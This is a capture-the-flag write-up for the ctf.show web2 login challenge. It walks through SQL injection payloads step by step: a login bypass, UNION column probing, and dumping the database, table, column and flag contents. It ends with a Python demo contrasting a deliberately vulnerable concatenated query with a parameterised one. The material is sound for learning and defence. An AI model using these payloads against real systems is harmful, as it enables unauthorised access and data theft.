ctf.show_web2-爱代码爱编程
Challenge:
<html lang="zh-CN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />
<title>ctf.show_web2</title>
</head>
<body>
<center>
<h2>ctf.show_web2</h2>
<hr>
<form method="post">
用户名:<input type="text" name="username"><br><br>
密 码:<input type="password" name="password"><br><br>
<input type="submit" value="登陆">
</form>
</center>
</body>
</html>
Solution:
The challenge is a login form, so the guess is SQL injection. First try the universal-password (authentication bypass) payload:
password=1&username=1' or true #
![image.png](https://img-blog.csdnimg.cn/img_convert/961171a0a4ead9652e3530259af2aee0.png)
Sure enough, SQL injection exists, but no flag is echoed. The point of the challenge is probably not the login bypass itself; the flag is most likely stored in the database. Next, find which column position ctfshow echoes back:
password=1&username=1' union select 1,2,3 #
![image.png](https://img-blog.csdnimg.cn/img_convert/ed694841fc883983c27f437e58c1e39a.png)
The echoed position is column 2, so start by dumping the database name:
password=1&username=1' union select 1,database(),3 #
![image.png](https://img-blog.csdnimg.cn/img_convert/92d62a8a6b94795df2b2b22a83966de9.png)
The database name is web2; continue by dumping its tables:
password=1&username=1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3 #
![image.png](https://img-blog.csdnimg.cn/img_convert/53cdd1a0c1592749d445433f06773836.png)
The known tables are flag and user, so the flag is most likely in the flag table, or in a column of it. Continue by dumping the columns.
Either of the following two payloads works:
password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='flag' #
password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() #
![image.png](https://img-blog.csdnimg.cn/img_convert/dbc88ee2e05d2acc04c50a08386a358c.png)
The flag has not turned up so far, so it is probably hidden in the table contents. Finally, dump the contents of the flag table.
Either of the following two payloads works:
password=2&username=1' union select 1,(select * from flag),3 #
password=2&username=1' union select 1,(select flag from flag),3 #
![image.png](https://img-blog.csdnimg.cn/img_convert/89721a792d68ffb83f85d00186edfe15.png)
The challenge flag is: ctfshow{1aefca01-afd4-4527-a35b-c5a8be893ae0}
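The root cause behind the whole walkthrough is a login query built by string concatenation. The following is an added example, not the challenge's own source (which the page does not show): it rebuilds a constructed web2-style schema in an in-memory SQLite database, runs the page's bypass and UNION payloads against a concatenated query, and shows that the same inputs are inert once the query uses bound parameters. The flag value is a placeholder, and the MySQL `#` comment is swapped for SQLite's `-- `.

```python
import sqlite3

# Constructed stand-in for the challenge's schema: a user table and a flag
# table, as enumerated via information_schema in the writeup.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user(id INTEGER, username TEXT, password TEXT);
        CREATE TABLE flag(flag TEXT);
        INSERT INTO user VALUES (1, 'admin', 'S3cret!');
        INSERT INTO flag VALUES ('ctfshow{placeholder}');
    """)
    return con

def login_vulnerable(con, username: str, password: str):
    # User input is spliced directly into the SQL text; a quote in the
    # username ends the literal and the rest becomes SQL syntax.
    sql = (f"SELECT id, username, password FROM user "
           f"WHERE username='{username}' AND password='{password}'")
    return con.execute(sql).fetchone()

def login_safe(con, username: str, password: str):
    # Bound parameters: the driver sends the input as data, so quotes,
    # OR clauses and UNIONs inside it never reach the SQL parser.
    sql = ("SELECT id, username, password FROM user "
           "WHERE username=? AND password=?")
    return con.execute(sql, (username, password)).fetchone()

# Page payloads, with '#' replaced by SQLite's '-- ' line comment.
BYPASS = "1' or true -- "
UNION = "1' union select 1,(select flag from flag),3 -- "

if __name__ == "__main__":
    con = make_db()
    print("vulnerable/bypass:", login_vulnerable(con, BYPASS, "1"))
    print("vulnerable/union: ", login_vulnerable(con, UNION, "1"))
    print("safe/bypass:      ", login_safe(con, BYPASS, "1"))
    print("safe/real creds:  ", login_safe(con, "admin", "S3cret!"))
```

Column 2 of the UNION result is where the flag lands, matching the echoed position the writeup found with `union select 1,2,3`.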